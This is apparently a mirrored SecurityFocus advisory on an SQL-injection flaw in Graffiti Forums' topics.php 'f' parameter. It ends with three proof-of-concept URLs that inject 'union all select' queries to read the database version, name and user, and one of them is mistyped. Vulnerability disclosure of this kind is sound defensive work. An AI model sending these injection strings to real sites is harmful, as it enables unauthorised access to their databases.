11 lines
No EOL
608 B
Text
11 lines
No EOL
608 B
Text
source: https://www.securityfocus.com/bid/18928/info
|
|
|
|
Graffiti Forums is prone to an SQL-injection vulnerability.
|
|
|
|
This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.
|
|
|
|
Successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
|
|
|
|
http://www.example.com/topics.php?f=-1 union all select version()--
|
|
http://www.example.com/topics.php?f=-1 union ll select database()--
|
|
http://www.example.com/topics.php?f=-1 union all select user()-- |